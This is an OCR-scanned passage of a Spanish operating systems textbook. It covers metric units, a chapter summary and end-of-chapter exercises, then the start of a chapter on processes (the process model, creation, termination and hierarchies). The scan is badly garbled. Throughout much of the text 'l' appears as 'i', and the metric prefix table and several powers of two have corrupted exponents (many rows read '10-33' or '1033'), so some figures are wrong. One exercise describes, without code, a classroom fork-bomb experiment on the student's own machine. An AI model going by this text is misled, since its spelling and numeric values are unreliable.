A continuación veremos aigunos ejempios prácticos de sistemas operativos reaies. Éstos son 
Linux (capítuio 10), Windows Vista (capítuio 11) y Symbian (capítuio 12). Ei iibro conciuye con 
ciertos consejos y pensamientos acerca dei diseño de sistemas operativos en ei capítuio 13. 


1.11 UNIDADES MÉTRICAS 

Para evitar cuaiquier confusión, vaie ia pena deciarar en forma expiícita que en este iibro, como en 
ia ciencia computacionai en generai, se utiiizan unidades métricas en vez de ias tradicionaies uni¬ 
dades dei sistema ingiés. Los principaies prefijos métricos se iistan en ia figura 1-31. Por io gene¬ 
rai, estos prefijos se abrevian con sus primeras ietras y ias unidades mayores de 1 están en 
mayúscuias. Así, una base de datos de 1TB ocupa 10^^ bytesdeaimacenamiento, y un reioj de 100 
pseg (o 100 ps) emite un puiso cada 10'^° segundos. Como miii y micro empiezan con ia ietra "m", 
se tuvo que hacer una eiección. Por io generai, "m" es para miii y "p" (ia ietra griega mu) es para 
micro. 


Exp. 

Explícito 

Prefijo 

Exp. 

Explícito 

Prefijo 

10-3 

0.001 

mili 

103 

1,000 

Kilo 

10-® 

0.000001 

micro 

10® 

1,000,000 

Mega 

10-3 

0.000000001 

nano 

103 

1,000,000,000 

Giga 

10-33 

0.000000000001 

pico 

1033 

1,000,000,000,000 

Tera 

10-33 

0.000000000000001 

femto 

1033 

1,000,000,000,000,000 

Peta 

10-33 

0.0000000000000000001 

atto 

1033 

1,000,000,000,000,000,000 

Exa 

10-33 

0.0000000000000000000001 

zepto 

1033 

1,000,000,000,000,000,000,000 

Zetta 

10-3“ 

0.0000000000000000000000001 

yocto 

103“ 

1,000,000,000,000,000,000,000,000 

Yotta 


Figura 1-31. Los principales prefijos métricos. 

También vaie ia pena recaicar que para medir ios tamaños de ias memorias, en ia práctica co¬ 
mún de ia industria, ias unidades tienen significados iigeramente diferentes. Ahí, Kiio significa 2“ 
(1024) en vez de 10^ (1000), debido a que ias memorias siempre utiiizan una potencia de dos. Por 
ende, una memoria de 1 KB contiene 1024 bytes, no 1000 bytes. De manera simiiar, una memoria 
de 1 M B contiene (1,048,576) bytes y una memoria de 1 GB contiene (1,073,741,824) by¬ 
tes. Sin embargo, una iínea de comunicación de 1 Kbps transmite 1000 bits por segundo y una LAN 
de 10 M bps opera a 10,000,000 bits/seg, debido a que estas veiocidades no son potencias de dos. 
Por desgracia, muchas personas tienden a mezciar estos dos sistemas, en especiai para ios tamaños 
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de los discos. Para evitar ambigüedades, en este iibro utiiizaremos ios símboios KB, M B y GB pa¬ 
ra 2“, y bytes, respectivamente y ios símboios K bps, M bps y G bps para 10^, 10® y 10® bits- 
/seg, respectivamente. 


1.12 RESUMEN 

L os sistemas operativos se pueden ver desde dos puntos de vista: como administradores de recursos 
y como máquinas extendidas. En ei punto de vista correspondiente ai administrador de recursos, ia 
función dei sistema operativo es administrar ias distintas partes dei sistema en forma eficiente. En ei 
punto de vista correspondiente a ia máquina extendida, ia función dei sistema operativo es proveerá 
ios usuarios abstracciones que sean más convenientes de usar que ia máquina actuai. Estas abstrac¬ 
ciones inciuyen ios procesos, espacios de direcciones y archivos. 

Los sistemas operativos tienen una iarga historia, empezando desde ios días en que reempiaza- 
ron ai operador, hasta ios sistemas modernos de muitiprogramación. Entre ios puntos importantes 
tenemos a ios primeros sistemas de procesamiento por iotes, ios sistemas de muitiprogramación y 
ios sistemas de computadora personai. 

Como ios sistemas operativos interactúan de cerca con ei hardware, es útii tener cierto conoci¬ 
miento dei hardware de computadora parea comprenderios. L as computadoras están compuestas de 
procesadores, memorias y dispositivos de E/S. Estas partes se conectan mediante buses. 

Los conceptos básicos en ios que se basan todos ios sistemas operativos son ios procesos, ia 
administración de memoria, ia administración de E/S, ei sistema de archivos y ia seguridad. Cada 
uno de estos conceptos se tratará con detaiie en un capítuio posterior. 

Ei corazón decuaiquier sistema operativo es ei conjunto deiiamadasai sistema que puede ma¬ 
nejar. Estas iiamadas indican io que reaimente haceei sistema operativo. Para UNIX, hemos visto 
cuatro grupos de iiamadas ai sistema. Ei primer grupo de iiamadas se reiaciona con ia creación y 
terminación de procesos. Ei segundo grupo es para ieer y escribir en archivos. Ei tercer grupo es pa¬ 
ra administrar directorios. Ei cuarto grupo contiene una misceiánea de iiamadas. 

Los sistemas operativos se pueden estructurar en varias formas. Las más comunes son como 
un sistema monoiítico, una jerarquía de capas, microkernei, ci i ente-servidor, máquina virtuai o 
exokernei. 


PROBLEMAS 


1. ¿Qué es la muitiprogramación? 

2. ¿Qué es spooling? ¿Cree usted que las computadoras personales avanzadas tendrán spooling como 
característica estándar en el futuro? 

3. En las primeras computadoras, cada byte de datos leídos o escritos se manejaba mediante la CPU 
(es decir, no había DMA). ¿Qué implicaciones tiene esto para la muitiprogramación? 
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4. La idea de una familia de computadoras fue introducida en la década de 1960 con las mainframes 
IBM System/360. ¿Está muerta ahora esta idea o sigue en pie? 

5. U na razón por la cual las GUI no se adoptaron con rapidez en un principio fue el costo del hardwa¬ 
re necesario para darles soporte. ¿Cuánta RAM de video se necesita para dar soporte a una pantalla 
de texto monocromático de 25 líneas x 80 caracteres? ¿Cuánta se necesita para un mapa de bits de 
1024 X 768 píxeles y colores 24 bits? ¿Cuál fue el costo de esta RAM con precios de 1980 
(5 dólares/K B)? ¿C uánto vale ahora? 

6 . Hay varias metas de diseño a la hora de crear un sistema operativo, por ejemplo: la utilización de 
recursos, puntualidad, que sea robusto, etcétera. De un ejemplo de dos metas de diseño que puedan 
contradecirse entre sí. 

7 . ¿Cuál de las siguientes instrucciones debe permitirse sólo en modo kernel? 

a) Deshabilitar todas las interrupciones. 

b) Leer el reloj de la hora del día. 

c) Establecer el reloj de la hora del día. 

d) Cambiar el mapa de memoria. 

8 . Considere un sistema con dosCPUsy que cada CPU tiene dos hilos (hiperhilamiento). Suponga que 
se inician tres programas PO, P1 y P2 con tiempos de ejecución de 5,10 y 20 mseg, respectivamen¬ 
te. ¿Cuánto se tardará en completar la ejecución de estos programas? Suponga que los tres progra¬ 
mas están 100% ligados a la CPU, que no se bloquean durante la ejecución y no cambian de CPU 
una vez que se les asigna. 

9. U na computadora tiene una canalización con cuatro etapas. Cada etapa requiere el mismo tiempo pa¬ 
ra hacer su trabajo, a saber, 1 nseg. ¿Cuántas instrucciones por segundo puede ejecutar esta máquina? 

10. Considere un sistema de cómputo con memoria caché, memoria principal (RA M ) y disco, y que el 
sistema operativo utiliza memoria virtual. Se requieren 2 nseg para acceder a una palabra desde la 
caché, 10 nseg para acceder a una palabra desde la RA M y 10 ms para acceder a una palabra desde 
el disco. Si la proporción de aciertos de caché es de 95% y la proporción de aciertos de memoria 
(después de un fallo de caché) es de 99%, ¿cuál es el tiempo promedio para acceder a una palabra? 

11. U n revisor alerta observa un error de ortografía consistente en el manuscrito del libro de texto de 
sistemas operativos que está a punto de ser impreso. El libro tiene cerca de 700 páginas, cada una 
con 50 líneas de 80 caracteres. ¿Cuánto tiempo se requerirá para digitalizar en forma electrónica el 
texto, para el caso en que la copia maestra se encuentre en cada uno de los niveles de memoria de 
la figura 1-9? Para los métodos de almacenamiento interno, considere que el tiempo de acceso da¬ 
do es por carácter, para los discos suponga que el tiempo es por bloque de 1024 caracteres y para la 
cinta suponga que el tiempo dado es para el inicio de los datos, con un acceso posterior a la misma 
velocidad que el acceso al disco. 

12. Cuando un programa de usuario realiza una llamada al sistema para leer o escribir en un archivo en 
disco, proporciona una indicación de qué archivo desea, un apuntador al búfer de datos y la cuenta. 
Después, el control se transfiere al sistema operativo, el cual llama al driver apropiado. Suponga que 
el driver inicia el disco y termina hasta que ocurre una interrupción. En el caso de leer del disco, es 
obvio que el procedimiento que hizo la llamada tiene que ser bloqueado (debido a que no hay datos 
para leer). ¿Qué hay sobre el caso de escribir en el disco? ¿Necesita ser bloqueado el procedimien¬ 
to llamador, para esperar a que se complete la transferencia del disco? 
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13. ¿Qué es una instrucción de trap? Expiique su uso en ios sistemas operativos. 

14. ¿Cuái es ia diferencia ciave entre un trap y una interrupción? 

15. ¿Por qué se necesita ia tabia de procesos en un sistema de tiempo compartido? ¿Se necesita también 
en ios sistemas de computadora personai en ios que sóio existe un proceso, y ese proceso ocupa to¬ 
da ia máquina hasta que termina? 

16. ¿Existe aiguna razón por ia que sería conveniente montar un sistema de archivos en un directorio no 
vacío? De ser así, ¿cuái es? 

17. ¿Cuái es ei propósito de una iiamada ai sistema en un sistema operativo? 

18. Para cada una de ias siguientes iiamadas ai sistema, proporcione una condición que haga que faiie: 
fork, exec y unlink. 

19. ¿Podría ia iiamada 

cuenta =write(fd, bufer, nbytes); 
devoiver aigún vaior en cuenta distinto de nbytes? Si es así, ¿por qué? 

20. U n archivo cuyo descriptor es fd contiene ia siguiente secuencia de bytes: 3,1, 4,1, 5, 9, 2, 6, 5, 3, 
5. Se reaiizan ias siguientes iiamadas ai sistema: 

iseekífd, 3, SEEK_SET); 

read(fd, 6¡bufer, 4); 

en donde ia iiamada iseek reaiiza una búsqueda en ei byte 3 dei archivo. ¿Qué contiene bufer des¬ 
pués de compietar ia operación de iectura? 

21. Suponga que un archivo de 10 M B se aimacena en un disco, en ia misma pista (pista #. 50) en sec¬ 
tores consecutivos. Ei brazo dei disco se encuentra actuaimente situado en ia pista número 100. 
¿Cuánto tardará en recuperar este archivo dei disco? Suponga que para despiazar ei brazo de un ci- 
iindro ai siguiente se requiere aproximadamente! msy se requieren aproximadamente 5 ms para que 
ei sector en ei que está aimacenado ei inicio dei archivo gire bajo ia cabeza. Suponga además que ia 
iectura ocurre a una veiocidad de 100 M B/s. 

22. ¿Cuái es ia diferencia esenciai entre un archivo especiai de bioquey un archivo especiai de carácter? 

23. En ei ejempio que se da en ia figura 1-17, ei procedimiento de bibiioteca se iiama read y ia misma 
iiamada ai sistema se iiama read. ¿Es esenciai que ambos tengan ei mismo nombre? Si no es así, 
¿cuái es más importante? 

24. Ei modeio ciiente-servidor es popuiar en ios sistemas distribuidos. ¿Puede utiiizarse también en un 
sistema de una soia computadora? 

25. Para un programador, una iiamada ai sistema se ve iguai que cuaiquier otra iiamada a un procedi¬ 
miento de bibiioteca. ¿Es importante que un programador sepa cuáies procedimientos de bibiioteca 
resuitan en iiamadas ai sistema? ¿Bajo qué circunstancias y porqué? 

26. La figura 1-23 muestra que varias iiamadas ai sistema de UNIX no tienen equivalentes en la API 
Win32. Para cada una de las llamadas que se listan y no tienen un equivalente en Win32, ¿cuáles 
son las consecuencias de que un programador convierta un programa de U NIX para que se ejecute 
en Window/s? 
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27. U n sistema operativo portátii se puede portar de ia arquitectura de un sistema a otro, sin ninguna 
modificación. Expiique por qué no es factibie construir un sistema operativo que sea compietamen- 
te portátii. Describados capas de aito nivei que tendrá ai diseñar un sistema operativo que sea aita- 
mente portátii. 

28. Expiique cómo ia separación de ia directiva y ei mecanismo ayuda a construir sistemas operativos 
basados en microkernei. 

29. H e aquí aigunas preguntas para practicar ias conversiones de unidades: 

(a) ¿A cuántos segundos equivaie un microaño? 

(b) A ios micrómetros se Íes conoce comúnmente como micrones. ¿Qué tan iargo es un gigamicron? 

(c) ¿Cuántos bytes hay en una memoria de 1TB? 

(d) La masa de ia Tierra es de 6000 yottagramos. ¿Cuánto es eso en kiiogramos? 

30. Escriba un sheii quesea simiiar a ia figura 1-19, pero que contenga suficiente código como para que 
pueda funcionar y io pueda probar. También podría agregar aigunas características como ia redirec¬ 
ción de ia entrada y ia saiida, ios canaies y ios trabajos en segundo piano. 

31. Si tiene un sistema personai parecido a UNIX (Linux, M INIX, FreeBSD, etcétera) disponibie que 
pueda hacer faiiar con seguridad y reiniciar, escriba una secuencia de comandos de sheii que inten¬ 
te crear un número iiimitado de procesos hijos y observe io que ocurre. Antes de ejecutar ei experi¬ 
mento, escriba sync en ei sheii para vaciar ios búferes dei sistema de archivos ai disco y evitar 
arruinar ei sistema de archivos. Nota: No intente esto en un sistema compartido sin obtener prime¬ 
ro permiso dei administrador dei sistema. Las consecuencias serán obvias de inmediato, por io que 
es probabie que io atrapen y sancionen. 

32. Examine y trate de interpretar ei contenido de un directorio tipo U NIX o Windows con una herra¬ 
mienta como el programa od de U NIX o el programa DE BUG de M S-DOS. Sugerencia: La forma 
en que haga esto dependerá de lo que permita el SO. U n truco que puede funcionar es crear un di¬ 
rectorio en un disco flexible con un sistema operativo y después leer los datos puros del disco usan¬ 
do un sistema operativo distinto que permita dicho acceso. 


2 


PROCESOS E HILOS 


Estamos a punto de emprender el estudio detallado de cómo los sistemas operativos son diseñados 
y construidos. El concepto más importante en cualquier sistema operativo es el de proceso, una abs¬ 
tracción de un programa en ejecución; todo lo demás depende de este concepto, por lo cual es im¬ 
portante que el diseñador del sistema operativo (y el estudiante) tenga una comprensión profunda 
acerca de lo que es un proceso lo más pronto posible. 

Los procesos son una de las abstracciones más antiguas e importantes que proporcionan los sis¬ 
temas operativos: proporcionan la capacidad de operar (pseudo) concurrentemente, incluso cuando 
hay sólo una CPU disponible. Convierten una CPU en varias CPU virtuales. Sin la abstracción de 
los procesos, la computación moderna no podría existir. En este capítulo examinaremos con gran 
detalle los procesos y sus primeros primos, los hilos (threads). 


2.1 PROCESOS 

Todas las computadoras modernas ofrecen varias cosas al mismo tiempo; quienes están acostum¬ 
brados a trabajar con ellas tal vez no estén completamente conscientes de este hecho, por lo que uti¬ 
lizaremos algunos ejemplos para aclarar este punto. Consideremos primero un servidor Web, a 
donde convergen las peticiones de páginas Web provenientes de todos lados. Cuando llega una pe¬ 
tición, el servidor verifica si la página que se necesita está en la caché. De ser así, devuelve la pá¬ 
gina; en caso contrario, inicia una petición al disco para obtenerla y, desde la perspectiva de la CPU, 
estas peticiones tardan eternidades. Mientras se espera el cumplimiento de una petición, muchas 


83 


84 


PROCESOS E HILOS 


CAPÍTULO 2 


más pueden llegar. Si hay varios discos presentes, algunas o todas las demás peticiones podrían di¬ 
rigirse a otros discos mucho antes de que se cumpla la primera petición. Es evidente que se necesita 
cierta forma de modelar y controlar esta concurrencia. Los procesos (y en especial los hilos) pueden 
ayudar en este caso. 

Ahora consideremos una PC de usuario. Cuando se arranca el sistema se inician muchos proce¬ 
sos en forma secreta, lo que a menudo el usuario desconoce. Por ejemplo, se podría iniciar un pro¬ 
ceso para esperar el correo electrónico entrante; otro que permite al antiviras comprobar perió¬ 
dicamente la disponibilidad de nuevas definiciones de virus; algunos procesos de usuario explícitos 
para, por ejemplo, imprimir archivos y quemar un CD-ROM, y todo esto mientras el usuario nave¬ 
ga por la Web. Toda esta actividad se tiene que administrar, y en este caso un sistema de multipro- 
gramación con soporte para múltiples procesos es muy útil. 

En cualquier sistema de multiprogramación, la CPU conmuta de un proceso a otro con rapidez, 
ejecutando cada uno durante décimas o centésimas de milisegundos; hablando en sentido estricto, 
en cualquier instante la CPU está ejecutando sólo un proceso, y en el transcurso de 1 segundo po¬ 
dría trabajar en varios de ellos, dando la apariencia de un paralelismo (o pseudoparalelismo, para 
distinguirlo del verdadero paralelismo de hardware de los sistemas multiprocesadores con dos o 
más CPUs que comparten la misma memoria física). Es difícil para las personas llevar la cuenta de 
varias actividades en paralelo; por lo tanto, los diseñadores de sistemas operativos han evoluciona¬ 
do con el paso de los años a un modelo conceptual (procesos secuenciales) que facilita el trabajo 
con el paralelismo. Este modelo, sus usos y algunas de sus consecuencias conforman el tema de es¬ 
te capítulo. 


2.1.1 EI modelo del proceso 

En este modelo, todo el software ejecutable en la computadora, que algunas veces incluye al sis¬ 
tema operativo, se organiza en varios procesos secuenciales (procesos, para abreviar). Un proce¬ 
so no es más que una instancia de un programa en ejecución, incluyendo los valores actuales del 
contador de programa, los registros y las variables. En concepto, cada proceso tiene su propia 
CPU virtual; en la realidad, la CPU real conmuta de un proceso a otro, pero para entender el sis¬ 
tema es mucho más fácil pensar en una colección de procesos que se ejecutan en (pseudo) para¬ 
lelo, en vez de tratar de llevar la cuenta de cómo la CPU conmuta de programa en programa. Esta 
conmutación rápida de un proceso a otro se conoce como multiprogramación, como vimos en el 
capítulo 1. 

La figura 2-1 (a) muestra una computadora multiprogramando cuatro programas en memoria; 
la figura 2-l(b) lista cuatro procesos, cada uno con su propio flujo de control (es decir, su propio 
contador de programa lógico) y cada uno ejecutándose en forma independiente. Desde luego que 
sólo hay un contador de programa físico, por lo que cuando se ejecuta cada proceso, se carga su 
contador de programa lógico en el contador de programa real. Cuando termina (por el tiempo que 
tenga asignado), el contador de programa físico se guarda en el contador de programa lógico alma¬ 
cenado, del proceso en memoria. En la figura 2-l(c) podemos ver que durante un intervalo suficien¬ 
temente largo todos los procesos han progresado, pero en cualquier momento dado sólo hay un 
proceso en ejecución. 
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Un contador de programa cuatro contadores 
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Figura 2-1. (a) Multiprogramación de cuatro programas, (b) Modelo conceptual de 
cuatro procesos secuenciales independientes, (c) Sólo hay un programa activo a la vez. 


En este capítulo vamos a suponer que sólo hay una CPU, aunque esa condición cada vez suce¬ 
de menos en la realidad debido a que los nuevos chips son multinúcleo, con dos, cuatro o más 
CPUs. En el capítulo 8 analizaremos los chips multinúcleo y los multiproces adores en general; 
mientras tanto es más simple considerar sólo una CPU a la vez. Así, cuando decimos que una CPU 
puede ejecutar sólo un proceso a la vez, si hay dos núcleos (o CPUs) cada uno de ellos puede eje¬ 
cutar sólo un proceso a la vez. 

Dado que la CPU conmuta rápidamente entre un proceso y otro, la velocidad a la que un pro¬ 
ceso ejecuta sus cálculos no es uniforme y tal vez ni siquiera sea reproducible si se ejecutan los mis¬ 
mos procesos de nuevo. Por ende, al programar los procesos debe asumirse esta variación de 
velocidad. Por ejemplo, considere un proceso de E/S que inicia una unidad de cinta magnética pa¬ 
ra restaurar los archivos respaldados, ejecuta un ciclo de inactividad 10,000 veces para permitir que 
obtenga la velocidad adecuada y después emite un comando para leer el primer registro. Si la CPU 
decide conmutar a otro proceso durante el ciclo de inactividad, el proceso de la cinta tal vez no se 
ejecute de nuevo sino hasta que el primer registro se encuentre más allá de la cabeza de lectura. 
Cuando un proceso tiene requerimientos críticos de tiempo real como éste, es decir, cuando deben 
ocurrir eventos específicos dentro de un número especificado de milisegundos, es necesario tomar 
medidas especiales para asegurar que ocurran. Sin embargo, por lo general la mayoría de los pro¬ 
cesos no se ven afectados por la multiprogramación subyacente de la CPU o las velocidades relati¬ 
vas de distintos procesos. 

La diferencia entre un proceso y un programa es sutil pero crucial. Aquí podría ayudarnos una 
analogía: un científico computacional con mente culinaria hornea un pastel de cumpleaños para su 
hija; tiene la receta para un pastel de cumpleaños y una cocina bien equipada con todos los ingre¬ 
dientes: harina, huevos, azúcar, extracto de vainilla, etcétera. En esta analogía, la receta es el pro¬ 
grama (es decir, un algoritmo expresado en cierta notación adecuada), el científico computacional 
es el procesador (CPU) y los ingredientes del pastel son los datos de entrada. El proceso es la acti¬ 
vidad que consiste en que nuestro cocinero vaya leyendo la receta, obteniendo los ingredientes y 
horneando el pastel. 
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Ahora imagine que el hijo del científico entra corriendo y gritando que una abeja acaba de pi¬ 
carlo. El científico computacional registra el punto de la receta en el que estaba (el estado del proce¬ 
so en curso se guarda), saca un libro de primeros auxilios y empieza a seguir las instrucciones que 
contiene. Aquí el procesador conmuta de un proceso (hornear el pastel) a uno de mayor prioridad (ad¬ 
ministrar cuidados médicos), cada uno de los cuales tiene un programa distinto (la receta y el libro 
de primeros auxilios). Cuando ya se ha ocupado de la picadura de abeja, el científico computacional 
regresa a su pastel y continúa en el punto en el que se había quedado. 

La idea clave es que un proceso es una actividad de cierto tipo: tiene un programa, una entra¬ 
da, una salida y un estado. Varios procesos pueden compartir un solo procesador mediante el uso de 
un algoritmo de planificación para determinar cuándo se debe detener el trabajo en un proceso pa¬ 
ra dar servicio a otro. 

Vale la pena recalcar que si un programa se está ejecutando por duplicado cuenta como dos pro¬ 
cesos. Por ejemplo, a menudo es posible iniciar un procesador de palabras dos veces o imprimir dos 
archivos al mismo tiempo si hay dos impresoras disponibles. El hecho de que dos procesos en eje¬ 
cución tengan el mismo programa no importa; son procesos distintos. El sistema operativo puede 
compartir el código entre ellos de manera que sólo haya una copia en la memoria, pero ése es un 
detalle técnico que no cambia la situación conceptual de dos procesos en ejecución. 


2.1.2 C reación de un proceso 

Los sistemas operativos necesitan cierta manera de crear procesos. En sistemas muy simples o sis¬ 
temas diseñados para ejecutar sólo una aplicación (por ejemplo, el controlador en un horno de mi¬ 
croondas), es posible tener presentes todos los procesos que se vayan a requerir cuando el sistema 
inicie. No obstante, en los sistemas de propósito general se necesita cierta forma de crear y termi¬ 
nar procesos según sea necesario durante la operación. Ahora analizaremos varias de estas cues¬ 
tiones. 

Hay cuatro eventos principales que provocan la creación de procesos: 

1. El arranque del sistema. 

2. La ejecución, desde un proceso, de una llamada al sistema para creación de procesos. 

3. Una petición de usuario para crear un proceso. 

4. El inicio de un trabajo por lotes. 

Generalmente, cuando se arranca un sistema operativo se crean varios procesos. Algunos de ellos 
son procesos en primer plano; es decir, procesos que interactúan con los usuarios (humanos) y rea¬ 
lizan trabajo para ellos. Otros son procesos en segundo plano, que no están asociados con usuarios 
específicos sino con una función específica. Por ejemplo, se puede diseñar un proceso en segundo 
plano para aceptar el correo electrónico entrante, que permanece inactivo la mayor parte del día pe¬ 
ro que se activa cuando llega un mensaje. Se puede diseñar otro proceso en segundo plano para 
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aceptar peticiones entrantes para las páginas Web hospedadas en ese equipo, que despierte cuando 
llegue una petición para darle servicio. Los procesos que permanecen en segundo plano para mane¬ 
jar ciertas actividades como correo electrónico, páginas Web, noticias, impresiones, etcétera, se co¬ 
nocen como demonios (daemons). Los sistemas grandes tienen comúnmente docenas de ellos. En 
UNIX podemos utilizar el programa ps para listar los procesos en ejecución. En Windows podemos 
usar el administrador de tareas. 

Además de los procesos que se crean al arranque, posteriormente se pueden crear otros. A me¬ 
nudo, un proceso en ejecución emitirá llamadas al sistema para crear uno o más procesos nuevos, pa¬ 
ra que le ayuden a realizar su trabajo. En especial, es útil crear procesos cuando el trabajo a realizar 
se puede formular fácilmente en términos de varios procesos interactivos relacionados entre sí, pero 
independientes en los demás aspectos. Por ejemplo, si se va a obtener una gran cantidad de datos a 
través de una red para su posterior procesamiento, puede ser conveniente crear un proceso para ob¬ 
tener los datos y colocarlos en un búfer compartido, mientras un segundo proceso remueve los ele¬ 
mentos de datos y los procesa. En un multiprocesador, al permitir que cada proceso se ejecute en una 
CPU distinta también se puede hacer que el trabajo se realice con mayor rapidez. 

En los sistemas interactivos, los usuarios pueden iniciar un programa escribiendo un comando 
o haciendo (doble) clic en un icono. Cualquiera de las dos acciones inicia un proceso y ejecuta el 
programa seleccionado. En los sistemas UNIX basados en comandos que ejecutan X, el nuevo pro¬ 
ceso se hace cargo de la ventana en la que se inició. En Microsoft Windows, cuando se inicia un 
proceso no tiene una ventana, pero puede crear una (o más) y la mayoría lo hace. En ambos siste¬ 
mas, los usuarios pueden tener varias ventanas abiertas a la vez, cada una ejecutando algún proce¬ 
so. Mediante el ratón, el usuario puede seleccionar una ventana e interactuar con el proceso, por 
ejemplo para proveer datos cuando sea necesario. 

La última situación en la que se crean los procesos se aplica sólo a los sistemas de procesa¬ 
miento por lotes que se encuentran en las mainframes grandes. Aquí los usuarios pueden enviar tra¬ 
bajos de procesamiento por lotes al sistema (posiblemente en forma remota). Cuando el sistema 
operativo decide que tiene los recursos para ejecutar otro trabajo, crea un proceso y ejecuta el si¬ 
guiente trabajo de la cola de entrada. 

Técnicamente, en todos estos casos, para crear un proceso hay que hacer que un proceso exis¬ 
tente ejecute una llamada al sistema de creación de proceso. Ese proceso puede ser un proceso de 
usuario en ejecución, un proceso del sistema invocado mediante el teclado o ratón, o un proceso del 
administrador de procesamiento por lotes. Lo que hace en todo caso es ejecutar una llamada al sis¬ 
tema para crear el proceso. Esta llamada al sistema indica al sistema operativo que cree un proceso 
y le indica, directa o indirectamente, cuál programa debe ejecutarlo. 

En UNIX sólo hay una llamada al sistema para crear un proceso; fonk. Esta llamada crea un 
clon exacto del proceso que hizo la llamada. Después de fork, los dos procesos (padre e hijo) tie¬ 
nen la misma imagen de memoria, las mismas cadenas de entorno y los mismos archivos abiertos. 
Eso es todo. Por lo general, el proceso hijo ejecuta después a execve o una llamada al sistema simi¬ 
lar para cambiar su imagen de memoria y ejecutar un nuevo programa. Por ejemplo, cuando un 
usuario escribe un comando tal como SOrt en el shell, éste crea un proceso hijo, que a su vez ejecu¬ 
ta a SOrt. La razón de este proceso de dos pasos es para permitir al hijo manipular sus descriptores 
de archivo después de fork, pero antes de execve, para poder lograr la redirección de la entrada es¬ 
tándar, la salida estándar y el error estándar. 
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Por el contrario, en Windows una sola llamada a una función de Win32 (CreateProcess) 
maneja la creación de procesos y carga el programa correcto en el nuevo proceso. Esta llamada 
tiene 10 parámetros, que incluyen el programa a ejecutar, los parámetros de la línea de coman¬ 
dos para introducir datos a ese programa, varios atributos de seguridad, bits que controlan si los 
archivos abiertos se heredan, información de prioridad, una especificación de la ventana que se 
va a crear para el proceso (si se va a crear una) y un apuntador a una estructura en donde se de¬ 
vuelve al proceso que hizo la llamada la información acerca del proceso recién creado. Además 
de CreateProcess, Win32 tiene cerca de 100 funciones más para administrar y sincronizar proce¬ 
sos y temas relacionados. 

Tanto en UNIX como en Windows, una vez que se crea un proceso, el padre y el hijo tienen 
sus propios espacios de direcciones distintos. Si cualquiera de los procesos modifica una palabra en 
su espacio de direcciones, esta modificación no es visible para el otro proceso. En UNIX, el espa¬ 
cio de direcciones inicial del hijo es una copia del padre, pero en definitiva hay dos espacios de di¬ 
recciones distintos involucrados; no se comparte memoria en la que se pueda escribir (algunas 
implementaciones de UNIX comparten el texto del programa entre los dos, debido a que no se pue¬ 
de modificar). Sin embargo, es posible para un proceso recién creado compartir algunos de los otros 
recursos de su creador, como los archivos abiertos. En Windows, los espacios de direcciones del hi¬ 
jo y del padre son distintos desde el principio. 

2.1.3 Terminación de procesos 

Una vez que se crea un proceso, empieza a ejecutarse y realiza el trabajo al que está destinado. Sin 
embargo, nada dura para siempre, ni siquiera los procesos. Tarde o temprano el nuevo proceso ter¬ 
minará, por lo general debido a una de las siguientes condiciones: 

1. Salida normal (voluntaria). 

2. Salida por error (voluntaria). 

3. Error fatal (involuntaria). 

4. Eliminado por otro proceso (involuntaria). 

La mayoría de los procesos terminan debido a que han concluido su trabajo. Cuando un com¬ 
pilador ha compilado el programa que recibe, ejecuta una llamada al sistema para indicar al siste¬ 
ma operativo que ha terminado. Esta llamada es exit en UNIX y ExitProcess en Windows. Los 
programas orientados a pantalla también admiten la terminación voluntaria. Los procesadores de 
palabras, navegadores de Internet y programas similares siempre tienen un icono o elemento de me¬ 
nú en el que el usuario puede hacer clic para indicar al proceso que elimine todos los archivos tem¬ 
porales que tenga abiertos y después termine. 

La segunda razón de terminación es que el proceso descubra un error. Por ejemplo, si un usua¬ 
rio escribe el comando 


CC foo.c 
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para compilar el programa foo.C y no existe dicho archivo, el compilador simplemente termina. 
Los procesos interactivos orientados a pantalla por lo general no terminan cuando reciben paráme¬ 
tros incorrectos. En vez de ello, aparece un cuadro de diálogo y se le pide al usuario que intente 
de nuevo. 

La tercera razón de terminación es un error fatal producido por el proceso, a menudo debido a 
un error en el programa. Algunos ejemplos incluyen el ejecutar una instrucción ilegal, hacer refe¬ 
rencia a una parte de memoria no existente o la división entre cero. En algunos sistemas (como 
UNIX), un proceso puede indicar al sistema operativo que desea manejar ciertos errores por sí mis¬ 
mo, en cuyo caso el proceso recibe una señal (se interrumpe) en vez de terminar. 

La cuarta razón por la que un proceso podría terminar es que ejecute una llamada al sistema 
que indique al sistema operativo que elimine otros procesos. En UNIX esta llamada es kill. La fun¬ 
ción correspondiente en Win32 es TerminateProcess. En ambos casos, el proceso eliminador debe 
tener la autorización necesaria para realizar la eliminación. En algunos sistemas, cuando un proce¬ 
so termina (ya sea en forma voluntaria o forzosa) todos los procesos que creó se eliminan de inme¬ 
diato también. Sin embargo, ni Windows ni UNIX trabajan de esta forma. 


2.1.4 J erarquías de procesos 

En algunos sistemas, cuando un proceso crea otro, el proceso padre y el proceso hijo continúan aso¬ 
ciados en ciertas formas. El proceso hijo puede crear por sí mismo más procesos, formando una je¬ 
rarquía de procesos. Observe que, a diferencia de las plantas y los animales que utilizan la 
reproducción sexual, un proceso sólo tiene un padre (pero cero, uno, dos o más hijos). 

En UNIX, un proceso y todos sus hijos, junto con sus posteriores descendientes, forman un gru¬ 
po de procesos. Cuando un usuario envía una señal del teclado, ésta se envía a todos los miembros 
del grupo de procesos actualmente asociado con el teclado (por lo general, todos los procesos acti¬ 
vos que se crearon en la ventana actual). De manera individual, cada proceso puede atrapar la se¬ 
ñal, ignorarla o tomar la acción predeterminada que es ser eliminado por la señal. 

Como otro ejemplo dónde la jerarquía de procesos juega su papel, veamos la forma en que 
UNIX se inicializa a sí mismo cuando se enciende la computadora. Hay un proceso especial (lla¬ 
mado init) en la imagen de inicio. Cuando empieza a ejecutarse, lee un archivo que le indica cuán¬ 
tas terminales hay. Después utiliza fork para crear un proceso por cada terminal. Estos procesos 
esperan a que alguien inicie la sesión. Si un inicio de sesión tiene éxito, el proceso de inicio de se¬ 
sión ejecuta un shell para aceptar comandos. Estos pueden iniciar más procesos y así sucesivamen¬ 
te. Por ende, todos los procesos en el sistema completo pertenecen a un solo árbol, con init en la 
raíz. 

En contraste, Windows no tiene un concepto de una jerarquía de procesos. Todos los procesos 
son iguales. La única sugerencia de una jerarquía de procesos es que, cuando se crea un proceso, el 
padre recibe un indicador especial un token (llamado manejador) que puede utilizar para controlar 
al hijo. Sin embargo, tiene la libertad de pasar este indicador a otros procesos, con lo cual invalida 
la jerarquía. Los procesos en UNIX no pueden desheredar a sus hijos. 
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2.1.5 E stados de un proceso 

Aunque cada proceso es una entidad independiente, con su propio contador de programa y estado 
